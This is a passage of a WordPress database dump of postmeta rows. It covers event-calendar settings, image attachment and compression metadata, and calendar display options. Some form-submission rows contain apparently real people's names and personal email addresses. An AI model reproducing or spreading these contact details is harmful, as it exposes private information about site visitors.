01:00:00'),(136840,264308,'_EventURL',''),(136811,264308,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617308273;s:12:\"_EventOrigin\";i:1617308273;s:13:\"_thumbnail_id\";i:1617309071;s:24:\"boldgrid_hide_page_title\";i:1617308274;s:17:\"_EventShowMapLink\";i:1617308274;s:13:\"_EventShowMap\";i:1617308274;s:15:\"_EventStartDate\";i:1617309071;s:13:\"_EventEndDate\";i:1617309071;s:18:\"_EventStartDateUTC\";i:1617309071;s:16:\"_EventEndDateUTC\";i:1617309071;s:14:\"_EventDuration\";i:1617308274;s:20:\"_EventCurrencySymbol\";i:1617308274;s:22:\"_EventCurrencyPosition\";i:1617308274;s:10:\"_EventCost\";i:1617308274;s:9:\"_EventURL\";i:1617308274;s:14:\"_EventTimezone\";i:1617308274;s:18:\"_EventTimezoneAbbr\";i:1617309071;s:27:\"_EventNextPendingRecurrence\";i:1617308274;s:26:\"_RTECregistrationsDisabled\";i:1617308274;s:17:\"_RTECdeadlineType\";i:1617308274;s:19:\"_RTECwhoCanRegister\";i:1617308274;s:23:\"_RTEClimitRegistrations\";i:1617308274;s:21:\"_RTECmaxRegistrations\";i:1617308274;s:16:\"_EventRecurrence\";i:1617308274;s:18:\"_RTECnumRegistered\";i:1617308274;s:13:\"_EventVenueID\";i:1617308274;s:12:\"_dp_original\";i:1617308274;s:10:\"_edit_last\";i:1617308345;s:12:\"post_content\";i:1617310428;s:16:\"tribe_events_cat\";i:1617332028;s:11:\"post_status\";i:1617309071;s:10:\"post_title\";i:1617309155;}'),(136833,264308,'_EventEndDate','2021-04-23 20:00:00'),(136841,264308,'_EventTimezone','America/Denver'),(136812,264308,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617308273;s:12:\"_EventOrigin\";i:1617308273;s:13:\"_thumbnail_id\";i:1617309071;s:24:\"boldgrid_hide_page_title\";i:1617308274;s:17:\"_EventShowMapLink\";i:1617308274;s:13:\"_EventShowMap\";i:1617308274;s:15:\"_EventStartDate\";i:1617309071;s:13:\"_EventEndDate\";i:1617309071;s:18:\"_EventStartDateUTC\";i:1617309071;s:16:\"_EventEndDateUTC\";i:1617309071;s:14:\"_EventDuration\";i:1617308274;s:20:\"_EventCurrencySymbol\";i:1617308274;s:22:\"_EventCurrencyPosition\";i:1617308274;s:10:\"_EventCost\";i:1617308274;s:9:\"_EventURL\";i:1617308274;s:14:\"_EventTimezone\";i:1617308274;s:18:\"_EventTimezoneAbbr\";i:1617309071;s:27:\"_EventNextPendingRecurrence\";i:1617308274;s:26:\"_RTECregistrationsDisabled\";i:1617308274;s:17:\"_RTECdeadlineType\";i:1617308274;s:19:\"_RTECwhoCanRegister\";i:1617308274;s:23:\"_RTEClimitRegistrations\";i:1617308274;s:21:\"_RTECmaxRegistrations\";i:1617308274;s:16:\"_EventRecurrence\";i:1617308274;s:18:\"_RTECnumRegistered\";i:1617308274;s:13:\"_EventVenueID\";i:1617308274;s:12:\"_dp_original\";i:1617308274;s:10:\"_edit_last\";i:1617308345;s:12:\"post_content\";i:1617310428;s:16:\"tribe_events_cat\";i:1617332028;s:11:\"post_status\";i:1617309071;s:10:\"post_title\";i:1617309155;}'),(136832,264308,'_EventStartDate','2021-04-23 19:00:00'),(136842,264308,'_EventTimezoneAbbr','MDT'),(136813,264308,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617308273;s:12:\"_EventOrigin\";i:1617308273;s:13:\"_thumbnail_id\";i:1617309071;s:24:\"boldgrid_hide_page_title\";i:1617308274;s:17:\"_EventShowMapLink\";i:1617308274;s:13:\"_EventShowMap\";i:1617308274;s:15:\"_EventStartDate\";i:1617309071;s:13:\"_EventEndDate\";i:1617309071;s:18:\"_EventStartDateUTC\";i:1617309071;s:16:\"_EventEndDateUTC\";i:1617309071;s:14:\"_EventDuration\";i:1617308274;s:20:\"_EventCurrencySymbol\";i:1617308274;s:22:\"_EventCurrencyPosition\";i:1617308274;s:10:\"_EventCost\";i:1617308274;s:9:\"_EventURL\";i:1617308274;s:14:\"_EventTimezone\";i:1617308274;s:18:\"_EventTimezoneAbbr\";i:1617309071;s:27:\"_EventNextPendingRecurrence\";i:1617308274;s:26:\"_RTECregistrationsDisabled\";i:1617308274;s:17:\"_RTECdeadlineType\";i:1617308274;s:19:\"_RTECwhoCanRegister\";i:1617308274;s:23:\"_RTEClimitRegistrations\";i:1617308274;s:21:\"_RTECmaxRegistrations\";i:1617308274;s:16:\"_EventRecurrence\";i:1617308274;s:18:\"_RTECnumRegistered\";i:1617308274;s:13:\"_EventVenueID\";i:1617308274;s:12:\"_dp_original\";i:1617308274;s:10:\"_edit_last\";i:1617308345;s:12:\"post_content\";i:1617310428;s:16:\"tribe_events_cat\";i:1617332028;s:11:\"post_status\";i:1617309071;s:10:\"post_title\";i:1617309155;}'),(136831,264308,'_EventShowMap',''),(136843,264308,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(136814,264308,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617308273;s:12:\"_EventOrigin\";i:1617308273;s:13:\"_thumbnail_id\";i:1617309071;s:24:\"boldgrid_hide_page_title\";i:1617308274;s:17:\"_EventShowMapLink\";i:1617308274;s:13:\"_EventShowMap\";i:1617308274;s:15:\"_EventStartDate\";i:1617309071;s:13:\"_EventEndDate\";i:1617309071;s:18:\"_EventStartDateUTC\";i:1617309071;s:16:\"_EventEndDateUTC\";i:1617309071;s:14:\"_EventDuration\";i:1617308274;s:20:\"_EventCurrencySymbol\";i:1617308274;s:22:\"_EventCurrencyPosition\";i:1617308274;s:10:\"_EventCost\";i:1617308274;s:9:\"_EventURL\";i:1617308274;s:14:\"_EventTimezone\";i:1617308274;s:18:\"_EventTimezoneAbbr\";i:1617309071;s:27:\"_EventNextPendingRecurrence\";i:1617308274;s:26:\"_RTECregistrationsDisabled\";i:1617308274;s:17:\"_RTECdeadlineType\";i:1617308274;s:19:\"_RTECwhoCanRegister\";i:1617308274;s:23:\"_RTEClimitRegistrations\";i:1617308274;s:21:\"_RTECmaxRegistrations\";i:1617308274;s:16:\"_EventRecurrence\";i:1617308274;s:18:\"_RTECnumRegistered\";i:1617308274;s:13:\"_EventVenueID\";i:1617308274;s:12:\"_dp_original\";i:1617308274;s:10:\"_edit_last\";i:1617308345;s:12:\"post_content\";i:1617310428;s:16:\"tribe_events_cat\";i:1617332028;s:11:\"post_status\";i:1617309071;s:10:\"post_title\";i:1617309155;}'),(136830,264308,'_EventShowMapLink',''),(136844,264308,'_RTECregistrationsDisabled','1'),(136845,264308,'_RTECdeadlineType','start'),(136815,264308,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617308273;s:12:\"_EventOrigin\";i:1617308273;s:13:\"_thumbnail_id\";i:1617309071;s:24:\"boldgrid_hide_page_title\";i:1617308274;s:17:\"_EventShowMapLink\";i:1617308274;s:13:\"_EventShowMap\";i:1617308274;s:15:\"_EventStartDate\";i:1617309071;s:13:\"_EventEndDate\";i:1617309071;s:18:\"_EventStartDateUTC\";i:1617309071;s:16:\"_EventEndDateUTC\";i:1617309071;s:14:\"_EventDuration\";i:1617308274;s:20:\"_EventCurrencySymbol\";i:1617308274;s:22:\"_EventCurrencyPosition\";i:1617308274;s:10:\"_EventCost\";i:1617308274;s:9:\"_EventURL\";i:1617308274;s:14:\"_EventTimezone\";i:1617308274;s:18:\"_EventTimezoneAbbr\";i:1617309071;s:27:\"_EventNextPendingRecurrence\";i:1617308274;s:26:\"_RTECregistrationsDisabled\";i:1617308274;s:17:\"_RTECdeadlineType\";i:1617308274;s:19:\"_RTECwhoCanRegister\";i:1617308274;s:23:\"_RTEClimitRegistrations\";i:1617308274;s:21:\"_RTECmaxRegistrations\";i:1617308274;s:16:\"_EventRecurrence\";i:1617308274;s:18:\"_RTECnumRegistered\";i:1617308274;s:13:\"_EventVenueID\";i:1617308274;s:12:\"_dp_original\";i:1617308274;s:10:\"_edit_last\";i:1617308345;s:12:\"post_content\";i:1617310428;s:16:\"tribe_events_cat\";i:1617332028;s:11:\"post_status\";i:1617309071;s:10:\"post_title\";i:1617309155;}'),(136829,264308,'boldgrid_hide_page_title','0'),(136846,264308,'_RTECwhoCanRegister','any'),(136816,264308,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617308273;s:12:\"_EventOrigin\";i:1617308273;s:13:\"_thumbnail_id\";i:1617309071;s:24:\"boldgrid_hide_page_title\";i:1617308274;s:17:\"_EventShowMapLink\";i:1617308274;s:13:\"_EventShowMap\";i:1617308274;s:15:\"_EventStartDate\";i:1617309071;s:13:\"_EventEndDate\";i:1617309071;s:18:\"_EventStartDateUTC\";i:1617309071;s:16:\"_EventEndDateUTC\";i:1617309071;s:14:\"_EventDuration\";i:1617308274;s:20:\"_EventCurrencySymbol\";i:1617308274;s:22:\"_EventCurrencyPosition\";i:1617308274;s:10:\"_EventCost\";i:1617308274;s:9:\"_EventURL\";i:1617308274;s:14:\"_EventTimezone\";i:1617308274;s:18:\"_EventTimezoneAbbr\";i:1617309071;s:27:\"_EventNextPendingRecurrence\";i:1617308274;s:26:\"_RTECregistrationsDisabled\";i:1617308274;s:17:\"_RTECdeadlineType\";i:1617308274;s:19:\"_RTECwhoCanRegister\";i:1617308274;s:23:\"_RTEClimitRegistrations\";i:1617308274;s:21:\"_RTECmaxRegistrations\";i:1617308274;s:16:\"_EventRecurrence\";i:1617308274;s:18:\"_RTECnumRegistered\";i:1617308274;s:13:\"_EventVenueID\";i:1617308274;s:12:\"_dp_original\";i:1617308274;s:10:\"_edit_last\";i:1617308345;s:12:\"post_content\";i:1617310428;s:16:\"tribe_events_cat\";i:1617332028;s:11:\"post_status\";i:1617309071;s:10:\"post_title\";i:1617309155;}'),(136818,264308,'_EventOrigin','events-calendar'),(136819,264308,'_EventOrigin','events-calendar'),(136820,264308,'_EventOrigin','events-calendar'),(136821,264308,'_EventOrigin','events-calendar'),(136822,264308,'_EventOrigin','events-calendar'),(136823,264308,'_EventOrigin','events-calendar'),(136824,264308,'_EventOrigin','events-calendar'),(136825,264308,'_EventOrigin','events-calendar'),(136826,264308,'_EventOrigin','events-calendar'),(136827,264308,'_EventOrigin','events-calendar'),(136828,264308,'_thumbnail_id','264309'),(136817,264308,'_EventOrigin','events-calendar'),(136847,264308,'_RTEClimitRegistrations','0'),(136848,264308,'_RTECmaxRegistrations','30'),(136849,264308,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(136850,264308,'_RTECnumRegistered','0'),(136851,264308,'_EventVenueID','262435'),(136853,264308,'_dp_original','263641'),(136854,264308,'_edit_lock','1617334207:2'),(136855,264308,'_edit_last','2'),(136856,264309,'_wp_attached_file','2021/04/bw-2-walking.jpg'),(136857,264309,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:576;s:6:\"height\";i:324;s:4:\"file\";s:24:\"2021/04/bw-2-walking.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"bw-2-walking-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"bw-2-walking-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:24:\"bw-2-walking-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:24:\"bw-2-walking-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:24:\"bw-2-walking-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:24:\"bw-2-walking-300x324.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"bw-2-walking-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(142863,265070,'protect_children',''),(142862,265069,'_seq_num','2'),(142861,265069,'_form_id','48'),(142860,265069,'_field_448','choll.03@comcast.net'),(142859,265069,'_field_447','Testing'),(142858,265069,'_field_446','Test 2'),(142857,265069,'protect_children',''),(142856,265068,'_seq_num','1'),(142855,265068,'_form_id','48'),(142854,265068,'_field_448','choll.03Q@comcast.net'),(142853,265068,'_field_447','Testing'),(142852,265068,'_field_446','Testing'),(142851,265068,'protect_children',''),(136899,264309,'original-file','2021/04/bw-2-walking-updraft-pre-smush-original.jpg'),(136900,264309,'smush-complete','1'),(136901,264309,'smush-info','The file was compressed from 47.12 KB to 44.19 KB saving 6.21 percent using WP-Optimize'),(136902,264309,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:48249;s:12:\"smushed-size\";i:45254;s:15:\"savings-percent\";d:6.20999999999999996447286321199499070644378662109375;}'),(136903,264294,'original-file','2021/03/compass-in-hand-updraft-pre-smush-original.jpg'),(136904,264294,'smush-complete','1'),(136905,264294,'smush-info','The file was compressed from 46.11 KB to 44.14 KB saving 4.27 percent using WP-Optimize'),(136906,264294,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:47213;s:12:\"smushed-size\";i:45199;s:15:\"savings-percent\";d:4.269999999999999573674358543939888477325439453125;}'),(181313,268406,'_thumbnail_id','268407'),(181314,268407,'original-file','2023/04/eck-wisdom-solving-probs-updraft-pre-smush-original.jpg'),(181315,268407,'smush-complete','1'),(181316,268407,'smush-info','The file was compressed from 57.48 KB to 54.96 KB saving 4.38 percent using WP-Optimize'),(181317,268407,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:58864;s:12:\"smushed-size\";i:56284;s:15:\"savings-percent\";d:4.37999999999999989341858963598497211933135986328125;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:58864;s:10:\"compressed\";i:56284;}s:6:\"medium\";a:2:{s:8:\"original\";i:10337;s:10:\"compressed\";i:10337;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5406;s:10:\"compressed\";i:5340;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:16743;s:10:\"compressed\";i:16743;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:26525;s:10:\"compressed\";i:26525;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:18821;s:10:\"compressed\";i:18821;}s:8:\"tileview\";a:2:{s:8:\"original\";i:17730;s:10:\"compressed\";i:17730;}}}'),(181312,268407,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:751;s:6:\"height\";i:421;s:4:\"file\";s:36:\"2023/04/eck-wisdom-solving-probs.jpg\";s:8:\"filesize\";i:58864;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:36:\"eck-wisdom-solving-probs-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10337;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:36:\"eck-wisdom-solving-probs-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5406;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:36:\"eck-wisdom-solving-probs-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16743;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:36:\"eck-wisdom-solving-probs-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26525;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:36:\"eck-wisdom-solving-probs-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18821;}s:8:\"tileview\";a:5:{s:4:\"file\";s:36:\"eck-wisdom-solving-probs-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17730;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(145818,265547,'_field_179','Carolyn'),(137022,264326,'_edit_lock','1617565660:2'),(137025,264326,'original-file','2021/04/2021-May-ESC-Seminar-2-updraft-pre-smush-original.jpg'),(137026,264326,'smush-complete','1'),(137027,264326,'smush-info','The file was compressed from 106.76 KB to 101.01 KB saving 5.39 percent using WP-Optimize'),(137028,264326,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:109319;s:12:\"smushed-size\";i:103430;s:15:\"savings-percent\";d:5.38999999999999968025576890795491635799407958984375;}'),(137029,264328,'_wp_attached_file','2021/04/hero-orange-wildflowers-5.jpg'),(137030,264328,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1918;s:6:\"height\";i:1097;s:4:\"file\";s:37:\"2021/04/hero-orange-wildflowers-5.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"hero-orange-wildflowers-5-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"hero-orange-wildflowers-5-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"hero-orange-wildflowers-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"hero-orange-wildflowers-5-768x439.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:439;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:37:\"hero-orange-wildflowers-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:37:\"hero-orange-wildflowers-5-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:37:\"hero-orange-wildflowers-5-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:37:\"hero-orange-wildflowers-5-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:38:\"hero-orange-wildflowers-5-1536x879.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:879;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"hero-orange-wildflowers-5-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(137031,264328,'_edit_lock','1617566519:2'),(137037,264328,'original-file','2021/04/hero-orange-wildflowers-5-updraft-pre-smush-original.jpg'),(137038,264328,'smush-complete','1'),(137039,264328,'smush-info','The file was compressed from 480.46 KB to 460.70 KB saving 4.11 percent using WP-Optimize'),(137040,264328,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:491990;s:12:\"smushed-size\";i:471753;s:15:\"savings-percent\";d:4.11000000000000031974423109204508364200592041015625;}'),(141115,264882,'_field_226','aecolomboc@gmail.com'),(141116,264882,'_field_227','CO'),(141117,264882,'_field_228','US'),(141114,264882,'_field_225','Colombo'),(141113,264882,'_field_224','Arie'),(143426,265126,'_form_id','46'),(143425,265126,'_field_427','ninesilentones@aol.com'),(143424,265126,'_field_426','Mueller-Uri'),(137308,264262,'show_only_one_occurrence','0'),(137309,264262,'show_ongoing_events','0'),(137310,264415,'protect_children',''),(137311,264415,'label',''),(137312,264415,'category','113'),(137313,264415,'location',''),(137314,264415,'organizer',''),(137315,264415,'tag',''),(137316,264415,'author',''),(137317,264415,'skin','monthly_view'),(137318,264415,'sk-options','a:20:{s:4:\"list\";a:36:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"M d Y\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:20:\"minimal_date_format3\";s:1:\"l\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:21:\"standard_date_format1\";s:3:\"d M\";s:22:\"accordion_date_format1\";s:1:\"d\";s:22:\"accordion_date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:20:\"toggle_month_divider\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:19:\"fluent_date_format1\";s:6:\"F d, Y\";s:13:\"display_price\";s:1:\"0\";s:25:\"display_available_tickets\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:4:\"grid\";a:36:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:18:\"clean_date_format1\";s:1:\"d\";s:18:\"clean_date_format2\";s:1:\"F\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:19:\"simple_date_format1\";s:5:\"M d Y\";s:21:\"colorful_date_format1\";s:1:\"d\";s:21:\"colorful_date_format2\";s:1:\"F\";s:21:\"colorful_date_format3\";s:1:\"l\";s:18:\"novel_date_format1\";s:5:\"d F Y\";s:5:\"count\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:19:\"fluent_date_format1\";s:9:\"D, F d, Y\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:6:\"agenda\";a:18:{s:5:\"style\";s:5:\"clean\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"l\";s:18:\"clean_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:13:\"full_calendar\";a:31:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:12:\"default_view\";s:4:\"list\";s:13:\"monthly_style\";s:5:\"clean\";s:5:\"limit\";s:0:\"\";s:4:\"list\";s:1:\"1\";s:16:\"date_format_list\";s:3:\"d M\";s:18:\"end_date_type_list\";s:4:\"date\";s:23:\"maximum_date_range_list\";s:0:\"\";s:4:\"grid\";s:1:\"0\";s:18:\"end_date_type_grid\";s:4:\"date\";s:23:\"maximum_date_range_grid\";s:0:\"\";s:4:\"tile\";s:1:\"0\";s:6:\"yearly\";s:1:\"0\";s:20:\"date_format_yearly_1\";s:1:\"l\";s:20:\"date_format_yearly_2\";s:3:\"F j\";s:7:\"monthly\";s:1:\"1\";s:19:\"activate_first_date\";s:1:\"0\";s:20:\"activate_current_day\";s:1:\"1\";s:6:\"weekly\";s:1:\"1\";s:5:\"daily\";s:1:\"1\";s:13:\"display_price\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"include_local_time\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:11:\"yearly_view\";a:16:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_year\";s:10:\"start_date\";s:0:\"\";s:19:\"modern_date_format1\";s:1:\"l\";s:19:\"modern_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:6:\"months\";a:12:{i:1;s:1:\"1\";i:2;s:1:\"1\";i:3;s:1:\"1\";i:4;s:1:\"1\";i:5;s:1:\"1\";i:6;s:1:\"1\";i:7;s:1:\"1\";i:8;s:1:\"1\";i:9;s:1:\"1\";i:10;s:1:\"1\";i:11;s:1:\"1\";i:12;s:1:\"1\";}s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:12:\"monthly_view\";a:17:{s:5:\"style\";s:6:\"simple\";s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:19:\"activate_first_date\";s:1:\"0\";s:20:\"activate_current_day\";s:1:\"1\";s:11:\"display_all\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"